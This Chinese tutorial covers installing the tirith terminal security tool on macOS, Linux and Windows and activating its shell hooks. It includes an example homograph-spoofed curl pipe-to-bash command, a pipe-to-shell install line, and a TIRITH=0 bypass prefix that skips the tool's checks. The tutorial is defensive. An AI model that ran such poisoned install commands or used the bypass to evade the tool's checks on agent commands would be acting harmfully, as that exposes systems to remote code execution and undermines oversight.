如何5分钟部署tirith终端安全工具:macOS/Linux/Windows安装与激活完整教程
发布时间:2026/10/1 17:07:25 锦皓数字建站

如何5分钟部署tirith终端安全工具macOS/Linux/Windows安装与激活完整教程【免费下载链接】tirithTerminal security for developers and AI agents. Intercepts homograph URLs, pipe-to-shell, ANSI injection, obfuscated payloads, data exfiltration, and malicious AI skills/configs before they execute.项目地址: https://gitcode.com/gh_mirrors/tir/tirithtirith 是一款面向开发者和 AI Agent 的终端安全工具它在你按下回车之前拦截命令识别同形异义 URLHomograph、curl | bash管道安装、Base64 解码执行、数据外传和恶意 AI 配置等 244 条检测规则覆盖的威胁。正常命令静默放行危险命令直接阻断——部署全程只需 5 分钟下面按系统逐步讲解安装与激活方法。为什么终端需要安全防护浏览器早就解决了同形异义攻击但终端不会。看这两条命令curl -sSL https://install.example-cli.dev | bash # 安全 curl -sSL https://іnstall.example-clі.dev | bash # 已被投毒第二个 URL 中的і是西里尔字母U0456肉眼几乎无法分辨但会解析到攻击者服务器。你的终端看不出区别tirith 能。它在你执行命令前完成结构分析危险命令根本不会被执行。威胁模型与边界说明见 docs/threat-model.md各能力检测/拦截/强制执行的完整清单见 docs/enforcement-coverage.md。第一步macOS 安装 —— Homebrew 一条命令macOS 用户最省事一条命令装完brew install tirith 提示Homebrew 公式定义可参考 packaging/homebrew/tirith.rb。装完直接进入激活步骤即可。第二步Linux 安装 —— apt / dnf / AUR / Nix 多方案Linux 用户按发行版选择对应方式都是最快配置方法级别的体验Debian / Ubuntu.debsudo dpkg -i tirith_*_amd64.debFedora / RHEL / CentOS 8.rpmsudo dnf install ./tirith-*.rpm以上安装包可从项目官方 Release 页获取对应平台文件。Arch LinuxAURyay -S tirith # 或 paru -S tirithNixnix profile install nixpkgs#tirith另外所有跨平台通用的安装脚本 scripts/install.sh 会自动检测系统架构、校验 SHA-256 和 cosign 签名并支持失败回滚。第三步Windows 安装 —— Scoop 或 Chocolateyscoop install tirith或使用社区 Chocolatey 仓库choco install tirith Windows 上支持检测、扫描、策略管理、审计和tirith setupPowerShell Hook 通过 PSReadLine 提供按键预检拦截需 PowerShell 7.0。平台功能差异详见 docs/compatibility.md。备选跨平台安装npm / Cargo / mise如果你的环境已有 Node 或 Rust 工具链npm install -g tirith # npm 方式 cargo install tirith # Cargo 方式 mise use -g tirith # mise 官方注册表npm 平台包定义见 npm/linux-x64/package.json。关键一步激活 Shell Hook30 秒完成安装只是第一步激活 shell hook才能让保护在你每次按回车时生效。把对应命令写入 shell 配置文件eval $(tirith init --shell zsh) # 写入 ~/.zshrc eval $(tirith init --shell bash) # 写入 ~/.bashrc tirith init --shell fish | source # 写入 ~/.config/fish/config.fisheval $(tirith init)不带参数时会自动检测当前 shell只有需要强制指定时才加--shell。Hook 实现源码可参考shell/lib/zsh-hook.zsh、shell/lib/bash-hook.bash、shell/lib/fish-hook.fish。各 shell 的拦截能力一览Shell拦截行为建议版本zsh可靠阻断accept-line 阶段5.8bashenter 模式可靠阻断preexec 默认仅告警5.0fish可靠阻断回车阶段3.5PowerShellPSReadLine 预检阻断7.0第四步健康检查 —— tirith doctor 验证部署激活后务必跑一次体检确认 hook 真的处于健康状态tirith doctor它会检查安装、hook 状态和策略配置--fix可尝试自动修复--quick快速模式。安装和每次升级后都建议执行一次。更多诊断模式见 docs/doctor-modes.md常见异常排查见 docs/troubleshooting.md。快速测试看看它到底能拦截什么测试 1同形异义 URL —— 直接阻断$ curl -sSL https://іnstall.example-clі.dev | bash tirith: BLOCKED [CRITICAL] non_ascii_hostname, Cyrillic і (U0456) in hostname命令根本没有执行。测试 2管道安装 —— 告警放行$ curl -fsSL https://get.docker.com | sh tirith: WARNING [MEDIUM] pipe_to_interpreter, Download piped to interpreter测试 3扫描文件与目录tirith scan ./ # 扫描当前目录含 AI 配置文件、CI 工作流 tirith check -- curl https://example.com | bash # 只分析不执行干净的命令零输出、零打扰——这正是它的设计目标让你忘记它的存在直到危险出现。常用命令速查表命令用途tirith check -- cmd分析命令而不执行tirith scan [path]扫描文件/目录/AI 配置tirith score url拆解 URL 信任信号tirith explain --rule id规则文档与修复建议tirith status/doctor保护状态与安装诊断tirith threat-db update更新签名威胁情报数据库tirith trust add url添加可信模式默认 30 天过期tirith daemon start后台守护亚毫秒级检查Unix完整 78 个子命令参考 docs/commands.md策略模板与自定义规则示例见 docs/cookbook.md。进阶为 AI Agent 与团队配置防护如果你日常使用 Claude Code、Cursor、Codex 等 AI 编码工具一条命令即可接入tirith setup claude-code --with-mcp它会自动写入阻断式 PreToolUse hookAgent 执行危险命令前会被 tirith 审查。各 AI 工具配置指南见 mcp/clients/claude-code.md、mcp/clients/cursor.md、mcp/clients/codex.md。团队或 CI 场景建议初始化一份策略tirith policy init --template startup # 小团队平衡配置 tirith policy validate # 校验策略现成模板包括个人、CI 严格、企业级、AI Agent 重度使用等位于 crates/tirith/assets/policy_templates/。维护更新、绕过与卸载更新包管理器安装的用户请走各自渠道如brew upgrade tirith独立二进制可用tirith update自更新默认校验 cosign 签名支持--rollback回滚。临时绕过确需放行某条命令时仅在单条命令前加TIRITH0前缀切勿全局导出。卸载按 shell 与安装方式的干净移除步骤见 docs/uninstall.md。✅部署完成从安装到 hook 激活只需 5 分钟。现在你的终端已经站在了危险命令的门口——同形异义 URL、管道投毒、数据外传、恶意 AI 配置都会在执行前被拦截。【免费下载链接】tirithTerminal security for developers and AI agents. Intercepts homograph URLs, pipe-to-shell, ANSI injection, obfuscated payloads, data exfiltration, and malicious AI skills/configs before they execute.项目地址: https://gitcode.com/gh_mirrors/tir/tirith创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
锦
锦皓数字建站
深耕本土企业品牌数字化升级,专注原创端正雅致商务官网,从视觉设计到稳定运维全程保驾护航。